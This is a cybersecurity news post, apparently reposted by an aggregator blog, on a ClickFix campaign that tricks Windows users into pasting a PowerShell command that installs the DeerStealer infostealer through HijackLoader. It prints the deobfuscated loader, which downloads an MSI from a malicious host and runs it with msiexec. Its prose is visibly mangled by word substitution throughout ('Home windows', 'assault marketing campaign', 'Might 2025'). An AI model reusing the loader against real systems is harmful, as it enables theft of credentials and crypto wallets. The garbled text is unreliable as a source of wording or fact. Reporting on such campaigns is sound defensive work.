Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Threat Actors Abuse Windows Run Prompt to Execute Malicious Command and Deploy DeerStealer

Posted on June 17, 2025June 17, 2025 By CWS

Cybersecurity researchers have uncovered a classy malware marketing campaign that exploits Home windows’ built-in Run immediate to ship DeerStealer, a strong info stealer designed to reap cryptocurrency wallets, browser credentials, and delicate private knowledge.

The malicious operation represents a regarding evolution in social engineering techniques, combining authentic Home windows performance with superior malware deployment methods to bypass conventional safety measures.

The assault marketing campaign, which has been lively all through Might 2025, employs a way referred to as ClickFix to deceive victims into voluntarily executing malicious PowerShell instructions by means of the Home windows Run dialog field.

ClickFix preliminary entry (Supply – Esentire)

Victims are usually redirected to convincing phishing pages that current faux error messages or system notifications, prompting them to press Home windows+R and paste a seemingly authentic command to “resolve” the fabricated difficulty.

This method successfully circumvents many safety controls by leveraging the consumer’s personal actions and trusted system processes.

eSentire safety analysts recognized a number of makes an attempt by menace actors to deploy this malware by means of their Menace Response Unit (TRU), revealing the marketing campaign’s widespread nature and complex technical implementation.

The researchers found that the malware, also called XFiles, is being offered on darkish internet hacking boards by a consumer recognized as “LuciferXfiles” by means of a subscription-based mannequin starting from $200 to $3000 per 30 days, relying on the function set and companies offered.

DeerStealer represents a complete knowledge theft platform able to extracting over 800 browser extension credentials, focusing on cryptocurrency wallets throughout 14 totally different digital currencies, and harvesting knowledge from in style functions together with Discord, Telegram, Steam, and numerous VPN purchasers.

The malware’s intensive capabilities prolong past easy credential theft, incorporating superior options corresponding to clipboard hijacking for cryptocurrency tackle substitution, hidden VNC entry for distant desktop management, and complex obfuscation methods that generate payloads with solely 50% similarity between samples.

The malware’s infrastructure makes use of a proxy area system referred to as “Gasket” to obscure the true command and management server places whereas sustaining persistent communication channels.

This method, mixed with the malware’s capacity to fingerprint sufferer machines utilizing {hardware} identifiers and system timestamps, demonstrates the menace actors’ dedication to operational safety and long-term marketing campaign sustainability.

Superior An infection Mechanism and Payload Deployment

The DeerStealer an infection chain begins with the execution of an obfuscated PowerShell command that victims paste into the Home windows Run immediate.

Assault chain (Supply – Esentire)

The decoded command reveals a classy multi-stage deployment course of that leverages living-off-the-land binaries to keep away from detection.

The preliminary PowerShell script accommodates the next deobfuscated content material:-

$AqEVu = $env:AppData;
operate kWERDs($EIpoJdP, $wQmPq){curl $EIpoJdP -o $wQmPq};
operate zPWQQKzb($CAvStqT){kWERDs $CAvStqT $wQmPq}
$wQmPq = $env:AppData + ‘now.msi’;
zPWQQKzb “hxxps://luckyseaworld[.]com/now.msi”;
msiexec.exe /i $wQmPq;;

This script makes use of the authentic curl.exe utility to obtain a Microsoft Installer package deal named “now.msi” from a compromised or malicious area, then executes it utilizing the Home windows Installer service.

The MSI file serves as a dropper for HijackLoader, a classy malware loader that emerged in 2023 and employs steganography to cover its configuration knowledge inside encrypted PNG photos.

As soon as deployed, HijackLoader copies a number of recordsdata to the C:ProgramData listing and executes a authentic, digitally signed COMODO Web Safety binary that has been manipulated by means of DLL hijacking methods.

The authentic executable masses a malicious model of cmdres.dll, which accommodates hooks within the C runtime that redirect execution move to the malware’s first stage, successfully utilizing the trusted binary as a car for malicious code execution whereas sustaining the looks of authentic system exercise.

Automate menace response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs throughout all endpoints -> Request full entry

Cyber Security News Tags:Abuse, Actors, Command, DeerStealer, Deploy, Execute, Malicious, Prompt, Run, Threat, Windows

Post navigation

Previous Post: Apache Tomcat Vulnerabilities Let Attackers Bypass Authentication & Trigger DoS Attacks
Next Post: TP-Link Router Flaw CVE-2023-33538 Under Active Exploit, CISA Issues Immediate Alert

Related Posts

AMOS macOS Stealer Hides in GitHub With Advanced Sophistication Methods Cyber Security News
Developing Collaborative Threat Intelligence Sharing Frameworks Cyber Security News
DSPM vs. DLP : Understanding the Key Differences Cyber Security News
How to Implement Zero Trust Architecture in Enterprise Networks Cyber Security News
FortiOS SSL-VPN Vulnerability Let Attackers Access full SSL-VPN settings Cyber Security News
Microsoft Rolls Out Windows 11 Cumulative Updates KB5058411 and KB5058405 Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • LangSmith Bug Could Expose OpenAI Keys and User Data via Malicious Agents
  • BeyondTrust Tools RCE Vulnerability Let Attackers Execute Arbitrary Code
  • Silver Fox APT Targets Taiwan with Complex Gh0stCringe and HoldingHands RAT Malware
  • Zyxel Firewall Vulnerability Again in Attacker Crosshairs
  • Google Warns of Scattered Spider Attacks Targeting IT Support Teams at U.S. Insurance Firms

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • June 2025
  • May 2025

Recent Posts

  • LangSmith Bug Could Expose OpenAI Keys and User Data via Malicious Agents
  • BeyondTrust Tools RCE Vulnerability Let Attackers Execute Arbitrary Code
  • Silver Fox APT Targets Taiwan with Complex Gh0stCringe and HoldingHands RAT Malware
  • Zyxel Firewall Vulnerability Again in Attacker Crosshairs
  • Google Warns of Scattered Spider Attacks Targeting IT Support Teams at U.S. Insurance Firms

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News